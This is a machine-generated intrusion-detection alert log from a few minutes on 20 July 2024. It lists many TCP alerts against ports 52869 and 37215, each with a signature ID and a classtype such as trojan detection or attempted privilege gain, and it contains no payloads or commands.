                      Timestamp:07/20/24-23:03:46.099099
                      SID:2025132
                      Source Port:42158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2829579
                      Source Port:55040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.118041
                      SID:2027339
                      Source Port:59874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280821
                      SID:2831300
                      Source Port:50254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.232174
                      SID:2025132
                      Source Port:51510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:39408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.288927
                      SID:2027339
                      Source Port:51686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.617689
                      SID:2831300
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.216693
                      SID:2027339
                      Source Port:60934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.007032
                      SID:2027339
                      Source Port:60640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:37970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:56022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:51176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.757934
                      SID:2027339
                      Source Port:47594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249115
                      SID:2027339
                      Source Port:40794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.090403
                      SID:2027339
                      Source Port:36694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.358348
                      SID:2831300
                      Source Port:57654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:37.123706
                      SID:2027339
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2831300
                      Source Port:36596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2027339
                      Source Port:54028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2835222
                      Source Port:58330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.938818
                      SID:2835222
                      Source Port:49236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.347676
                      SID:2025132
                      Source Port:46104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:03.032025
                      SID:2027339
                      Source Port:58854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044537
                      SID:2835222
                      Source Port:50196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.092574
                      SID:2027339
                      Source Port:34552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.045685
                      SID:2835222
                      Source Port:33838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2027339
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2831300
                      Source Port:60208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2831300
                      Source Port:38634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.676253
                      SID:2027339
                      Source Port:58742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2027339
                      Source Port:45418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.187171
                      SID:2027339
                      Source Port:59650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2025132
                      Source Port:50062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2831300
                      Source Port:36946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2027339
                      Source Port:58450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.486619
                      SID:2027339
                      Source Port:43862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.698636
                      SID:2831300
                      Source Port:41422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:54258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2831300
                      Source Port:54792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2829579
                      Source Port:45194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.256493
                      SID:2025132
                      Source Port:52512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:46326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.410893
                      SID:2025132
                      Source Port:47218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650243
                      SID:2829579
                      Source Port:58900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.698984
                      SID:2831300
                      Source Port:40512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:49432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2025132
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2831300
                      Source Port:49448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2027339
                      Source Port:44104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.275004
                      SID:2025132
                      Source Port:55772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.490827
                      SID:2027339
                      Source Port:51232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.944006
                      SID:2027339
                      Source Port:43396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2831300
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2829579
                      Source Port:47256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2025132
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.183470
                      SID:2027339
                      Source Port:59044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2831300
                      Source Port:59490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2829579
                      Source Port:56050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.238000
                      SID:2025132
                      Source Port:52642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2831300
                      Source Port:49680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2027339
                      Source Port:35654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.918789
                      SID:2027339
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220685
                      SID:2829579
                      Source Port:36734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.817395
                      SID:2027339
                      Source Port:35392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2025132
                      Source Port:58682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.392805
                      SID:2831300
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.567841
                      SID:2025132
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:05.636717
                      SID:2027339
                      Source Port:34174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2831300
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2829579
                      Source Port:50178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.210612
                      SID:2831300
                      Source Port:59372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2027339
                      Source Port:60998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.151841
                      SID:2027339
                      Source Port:58956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.577149
                      SID:2831300
                      Source Port:44372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2835222
                      Source Port:38768
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2835222
                      Source Port:33436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:33910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.078618
                      SID:2027339
                      Source Port:43602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.449592
                      SID:2027339
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2835222
                      Source Port:34534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.546535
                      SID:2027339
                      Source Port:45056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.831437
                      SID:2027339
                      Source Port:51570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2829579
                      Source Port:46632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.623583
                      SID:2831300
                      Source Port:33670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:54210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.500697
                      SID:2025132
                      Source Port:59950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.527007
                      SID:2027339
                      Source Port:39876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.354322
                      SID:2025132
                      Source Port:35380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.608153
                      SID:2027339
                      Source Port:37398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2027339
                      Source Port:32852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:37038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.498156
                      SID:2025132
                      Source Port:38412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.808111
                      SID:2831300
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2027339
                      Source Port:41774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:43118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.767377
                      SID:2027339
                      Source Port:42954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.139063
                      SID:2025132
                      Source Port:43466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.549051
                      SID:2025132
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.176757
                      SID:2027339
                      Source Port:53902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.515688
                      SID:2025132
                      Source Port:38398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:21.324806
                      SID:2025132
                      Source Port:46214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2027339
                      Source Port:33130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.939279
                      SID:2831300
                      Source Port:49680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2027339
                      Source Port:51354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:37906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:39132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.345953
                      SID:2027339
                      Source Port:45422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.103737
                      SID:2835222
                      Source Port:45384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.133788
                      SID:2027339
                      Source Port:58818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:50054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2027339
                      Source Port:53396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.030102
                      SID:2027339
                      Source Port:36116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.637859
                      SID:2027339
                      Source Port:57312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.543362
                      SID:2831300
                      Source Port:58208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.021159
                      SID:2829579
                      Source Port:60526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.943877
                      SID:2025132
                      Source Port:50128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.491962
                      SID:2027339
                      Source Port:54654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2831300
                      Source Port:47972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:33444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2831300
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2835222
                      Source Port:56318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.069870
                      SID:2831300
                      Source Port:33706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:55702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2027339
                      Source Port:35544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2831300
                      Source Port:38080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.633889
                      SID:2027339
                      Source Port:54264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2027339
                      Source Port:60702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.287905
                      SID:2025132
                      Source Port:55880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2835222
                      Source Port:55724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.525770
                      SID:2027339
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.126622
                      SID:2027339
                      Source Port:42544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.300735
                      SID:2831300
                      Source Port:52236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:33656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.765093
                      SID:2831300
                      Source Port:33644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.351070
                      SID:2027339
                      Source Port:45256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486622
                      SID:2831300
                      Source Port:43704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.095698
                      SID:2829579
                      Source Port:51666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.724267
                      SID:2025132
                      Source Port:42848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:55528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.407760
                      SID:2027339
                      Source Port:53640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630767
                      SID:2829579
                      Source Port:46646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2829579
                      Source Port:37634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.983744
                      SID:2025132
                      Source Port:40058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.380126
                      SID:2027339
                      Source Port:47888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2027339
                      Source Port:56908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.648154
                      SID:2025132
                      Source Port:54326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2027339
                      Source Port:37212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.128674
                      SID:2027339
                      Source Port:46790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2829579
                      Source Port:37716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.449742
                      SID:2027339
                      Source Port:43924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2831300
                      Source Port:44984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:38558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2835222
                      Source Port:56550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.343511
                      SID:2025132
                      Source Port:52950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.356560
                      SID:2027339
                      Source Port:51592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2835222
                      Source Port:39054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.225977
                      SID:2025132
                      Source Port:43060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2027339
                      Source Port:59232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.861410
                      SID:2027339
                      Source Port:55224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.623848
                      SID:2831300
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.263057
                      SID:2025132
                      Source Port:59984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2831300
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2829579
                      Source Port:35822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.169212
                      SID:2027339
                      Source Port:44662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:43576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.482016
                      SID:2025132
                      Source Port:60160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.215254
                      SID:2027339
                      Source Port:42804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.837135
                      SID:2027339
                      Source Port:34854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.126921
                      SID:2025132
                      Source Port:52722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2027339
                      Source Port:48124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.484644
                      SID:2027339
                      Source Port:51464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:52812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:39574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2831300
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.750742
                      SID:2831300
                      Source Port:42832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2829579
                      Source Port:53734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.967403
                      SID:2831300
                      Source Port:48342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.651536
                      SID:2835222
                      Source Port:38282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:13.672930
                      SID:2831300
                      Source Port:36658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
